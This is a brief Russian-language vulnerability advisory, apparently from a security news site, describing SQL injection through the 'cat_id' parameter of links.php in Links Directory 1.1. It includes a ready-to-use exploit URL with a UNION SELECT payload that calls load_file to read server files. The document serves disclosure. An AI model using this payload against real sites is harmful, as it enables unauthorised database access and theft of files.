Программа: Links Directory 1.1

Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных в параметре «cat_id» сценарием links.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.

Эксплоит:

http://site.com/links.php?ax=list&sub=2&cat_id= -1%20UNION%20ALL%20SELECT%201,2,load_file(‘/home’),4,5,6,7,8,9,10,11,12, 13%20FROM%20links/*



Оставить мнение